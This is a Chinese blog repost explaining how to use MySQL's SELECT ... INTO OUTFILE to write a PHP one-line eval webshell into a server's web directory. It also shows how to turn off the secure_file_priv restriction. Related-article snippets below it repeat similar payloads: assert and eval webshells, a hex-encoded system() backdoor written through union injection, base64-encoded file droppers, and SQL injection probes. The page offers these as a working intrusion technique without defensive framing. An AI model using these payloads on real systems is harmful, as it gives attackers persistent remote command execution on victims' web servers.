通过mysql写入php一句话木马

最新推荐文章于 2024-06-22 17:45:00 发布
最新推荐文章于 2024-06-22 17:45:00 发布
阅读量1.3k 收藏 3
点赞数
文章标签: php 数据库 操作系统
原文链接:http://www.cnblogs.com/baby123/p/10432205.html
版权

 利用mysql写入一句话木马

前提:

  root权限,知道了服务器的web的绝对路径

select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"

如果执行成功,生成D:\WWW\22.php,并写入

<?php @eval($_POST['pass']);?>

如果出现:

  提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制,默认不允许

show variables like '%secure%';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意: 

  1、绝对路径的猜解

  2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(对反斜杠做了一次转义)

 

转载于:https://www.cnblogs.com/baby123/p/10432205.html

aituochang1886
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 写入慢_通过慢查询日志写入一句话木马
weixin_39724266的博客
12-21 597
微信搜一搜字母安全前提你得知道账号密码整个基本思路是这样...1.首先通过注入、弱口令爆破、社会工程学...等等获取mysql数据库的用户名和密码2.通过相关渠道(探针文件...等等)获取mysql数据库的登录地址3.使用用户名和密码登陆mysql4.获取网站可写目录的绝对路径5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站6.使用菜刀连接一句话木马1.登录phpMyAdm...
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2367
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
mysql写入一句话木马
热门推荐
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
渗透干货|史上最全一句话木马
最新发布
qkh1234567的博客
06-22 1160
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包。😝有需要的小伙伴,可以点击下方链接免费领取【一一帮助安全学习,所有资源获取处一一】①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析。
mysql 一句话木马_通过mysql写入一句话木马
weixin_32522079的博客
01-18 1306
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
php一句话木马连接客户端_【WEB安全】phpmyadmin通过日志写入一句话木马
weixin_39531582的博客
12-04 827
1.想通过into outfile写入一句话木马select '<?php assert($_POST["cmd"];?)>' into outfile 'D:/phpstudy/PHPTutorial/WWW/xx.php';需要知道绝对路径2.执行下来,报错 “MySQL服务器正在使用--secure-file-priv选项运行,因此它无法执行此语句”那么就要知道这个 secure...
mysql 木马_通过mysql写入一句话木马
weixin_34641420的博客
01-27 1892
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
mysql木马一句话_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_39790877的博客
02-07 447
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
php mysql 注入一句话木马_phpmyadmin写一句话木马拿webshell思路(骇客协会)
weixin_35562134的博客
01-28 1317
先介绍MySQL导出一句话木马的语法(我个人比较喜欢说思路)Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(' php eval_r($_POST[cmd]);?>'); //把一句话木...
phpmyadmin通过日志写入一句话木马
weixin_45983744的博客
12-26 4386
QQ交流群:876554035 1.想通过into outfile写入一句话木马 select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’; 需要知道绝对路径 2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9338
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
mysql写入木马getshell总结
orange777
02-25 5477
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句话getshell
sql注入之into outfile语句写入一句话木马_sql的into outfile
code8889的博客
04-15 1144
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
一句话木马SQL注入
人若有志,就不会在半坡停止。
08-25 2853
sql注入
MYSQL一句话写入
1002710030
12-29 717
mysql_query("insert into `qq`(`id`,`xm1`,`xm2`,`xm3`)values(NULL,'$xm1','$xm12','$xm13')");
通过Mysql 的语句生成后门木马的方法
青春奋斗
07-15 959
SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile c:/inetpub/wwwroot/cmd.php通过Mysql 的注入或者在 phpmyad
php mysql 注入一句话木马_PHP与SQL语句写一句话木马总结
weixin_30290673的博客
01-28 448
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:二、编码的替换的类型://会生成@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));//php在html内部的一种嵌入方式session_start();$...
PHP实现的校园一卡通管理系统设计与实现
这篇论文详细阐述了一种基于PHPMySQL的校园"一卡通"管理系统的设计与实现。PHP作为一种动态脚本语言,因其开源、执行速度快的特性被选用为开发语言。MySQL则作为数据库管理系统,提供了数据存储和管理的基础。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值